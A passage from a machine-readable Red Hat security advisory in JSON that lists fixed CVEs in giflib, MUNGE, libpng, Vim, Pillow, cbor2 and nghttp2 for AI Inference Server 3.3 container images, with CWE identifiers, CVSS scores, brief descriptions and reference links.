"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "giflib: Giflib: Double-free vulnerability leading to memory corruption"
},
{
"cve": "CVE-2026-25506",
"cwe": {
"id": "CWE-120",
"name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)"
},
"discovery_date": "2026-02-10T20:02:45.975029+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438715"
}
],
"notes": [
{
"category": "description",
"text": "A buffer overflow vulnerability was discovered in the MUNGE authentication daemon (munged). In affected versions, a local attacker can potentially leak secret cryptographic key material from the daemon\u0027s memory by sending a specially crafted message with an oversized address field. With the leaked key, an attacker could forge authentication credentials to impersonate any user, potentially escalating privileges in systems that rely on MUNGE for identity verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "MUNGE: MUNGE has a buffer overflow in message unpacking allows key leakage and credential forgery",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "An Important vulnerability was discovered in `munged`. A local attacker could sending a specially crafted message to leak cryptographic key material. This could enable them to forge MUNGE credentials and impersonate any user, including a system administrator. The impact of this vulnerability is less than Critical as it cannot be exploited remotely.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25506"
},
{
"category": "external",
"summary": "RHBZ#2438715",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438715"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25506",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25506"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25506",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25506"
},
{
"category": "external",
"summary": "https://github.com/dun/munge/commit/bf40cc27c4ce8451d4b062c9de0b67ec40894812",
"url": "https://github.com/dun/munge/commit/bf40cc27c4ce8451d4b062c9de0b67ec40894812"
},
{
"category": "external",
"summary": "https://github.com/dun/munge/releases/tag/munge-0.5.18",
"url": "https://github.com/dun/munge/releases/tag/munge-0.5.18"
},
{
"category": "external",
"summary": "https://github.com/dun/munge/security/advisories/GHSA-r9cr-jf4v-75gh",
"url": "https://github.com/dun/munge/security/advisories/GHSA-r9cr-jf4v-75gh"
}
],
"release_date": "2026-02-10T18:55:57.708000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "MUNGE: MUNGE has a buffer overflow in message unpacking allows key leakage and credential forgery"
},
{
"cve": "CVE-2026-25646",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2026-02-10T18:01:28.232408+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438542"
}
],
"notes": [
{
"category": "description",
"text": "A heap based buffer overflow flaw has been discovered in LibPNG. Prior to version 1.6.55, an out-of-bounds read vulnerability exists in the png_set_quantize() API function. When the function is called with no histogram and the number of colors in the palette is more than twice the maximum supported by the user\u0027s display, certain palettes will cause the function to enter into an infinite loop that reads past the end of an internal heap-allocated buffer. The images that trigger this vulnerability are valid per the PNG specification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libpng: LIBPNG has a heap buffer overflow in png_set_quantize",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "For `java-17-openjdk-headless` and `java-21-openjdk-headless`, while the affected code is present in the bundled sources, it is not exercised by these headless packages.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25646"
},
{
"category": "external",
"summary": "RHBZ#2438542",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438542"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25646",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25646"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25646",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25646"
},
{
"category": "external",
"summary": "http://www.openwall.com/lists/oss-security/2026/02/09/7",
"url": "http://www.openwall.com/lists/oss-security/2026/02/09/7"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/commit/01d03b8453eb30ade759cd45c707e5a1c7277d88",
"url": "https://github.com/pnggroup/libpng/commit/01d03b8453eb30ade759cd45c707e5a1c7277d88"
},
{
"category": "external",
"summary": "https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3",
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3"
}
],
"release_date": "2026-02-10T17:04:38.501000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "libpng: LIBPNG has a heap buffer overflow in png_set_quantize"
},
{
"cve": "CVE-2026-25749",
"cwe": {
"id": "CWE-120",
"name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)"
},
"discovery_date": "2026-02-09T11:08:59.061581+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437843"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Vim, an open source, command line text editor. This heap buffer overflow vulnerability exists in the tag file resolution logic when processing the \u0027helpfile\u0027 option. A local user could exploit this by providing a specially crafted \u0027helpfile\u0027 option value, leading to a heap buffer overflow. This could result in arbitrary code execution or a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vim: Vim: Arbitrary code execution via \u0027helpfile\u0027 option processing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This MODERATE impact vulnerability in Vim\u0027s tag file resolution logic allows a local attacker to achieve a out-of-bounds write. By providing a specially crafted `helpfile` option value a local user can trigger a heap buffer overflow, as consequence lead to memory corruption presenting a data integrity impact or leading the vim process to crash resulting in availability impact. Although being non-trivial and very complex, arbitrary code execution is not discarded as worst case scenario.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25749"
},
{
"category": "external",
"summary": "RHBZ#2437843",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437843"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25749",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25749"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25749",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25749"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/commit/0714b15940b245108e6e9d7aa2260dd849a26fa9",
"url": "https://github.com/vim/vim/commit/0714b15940b245108e6e9d7aa2260dd849a26fa9"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/releases/tag/v9.1.2132",
"url": "https://github.com/vim/vim/releases/tag/v9.1.2132"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/security/advisories/GHSA-5w93-4g67-mm43",
"url": "https://github.com/vim/vim/security/advisories/GHSA-5w93-4g67-mm43"
}
],
"release_date": "2026-02-06T22:43:38.630000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vim: Vim: Arbitrary code execution via \u0027helpfile\u0027 option processing"
},
{
"cve": "CVE-2026-25990",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-02-11T21:05:39.535631+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439170"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "RHBZ#2439170",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439170"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa",
"url": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc"
}
],
"release_date": "2026-02-11T20:53:52.524000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image"
},
{
"cve": "CVE-2026-26209",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-03-23T19:02:13.009646+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2450422"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in cbor2, a library for encoding and decoding Concise Binary Object Representation (CBOR) data. A remote attacker can exploit this vulnerability by sending a specially crafted CBOR payload containing deeply nested structures. This can cause the application to crash due to uncontrolled recursion, leading to a complete Denial of Service (DoS) for the affected application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cbor2: cbor2: Denial of Service due to uncontrolled recursion via crafted CBOR payloads",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26209"
},
{
"category": "external",
"summary": "RHBZ#2450422",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450422"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26209",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26209"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26209",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26209"
},
{
"category": "external",
"summary": "https://github.com/agronholm/cbor2/commit/e61a5f365ba610d5907a0ae1bc72769bba34294b",
"url": "https://github.com/agronholm/cbor2/commit/e61a5f365ba610d5907a0ae1bc72769bba34294b"
},
{
"category": "external",
"summary": "https://github.com/agronholm/cbor2/pull/275",
"url": "https://github.com/agronholm/cbor2/pull/275"
},
{
"category": "external",
"summary": "https://github.com/agronholm/cbor2/releases/tag/5.9.0",
"url": "https://github.com/agronholm/cbor2/releases/tag/5.9.0"
},
{
"category": "external",
"summary": "https://github.com/agronholm/cbor2/security/advisories/GHSA-3c37-wwvx-h642",
"url": "https://github.com/agronholm/cbor2/security/advisories/GHSA-3c37-wwvx-h642"
}
],
"release_date": "2026-03-23T18:53:10.268000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "cbor2: cbor2: Denial of Service due to uncontrolled recursion via crafted CBOR payloads"
},
{
"cve": "CVE-2026-27135",
"cwe": {
"id": "CWE-617",
"name": "Reachable Assertion"
},
"discovery_date": "2026-03-18T19:02:13.823002+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448754"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in nghttp2. Due to missing internal state validation, the library continues to process incoming data even after a session has been terminated. A remote attacker could exploit this by sending a specially crafted HTTP/2 frame, leading to an assertion failure and a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "nghttp2: nghttp2: Denial of Service via malformed HTTP/2 frames after session termination",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
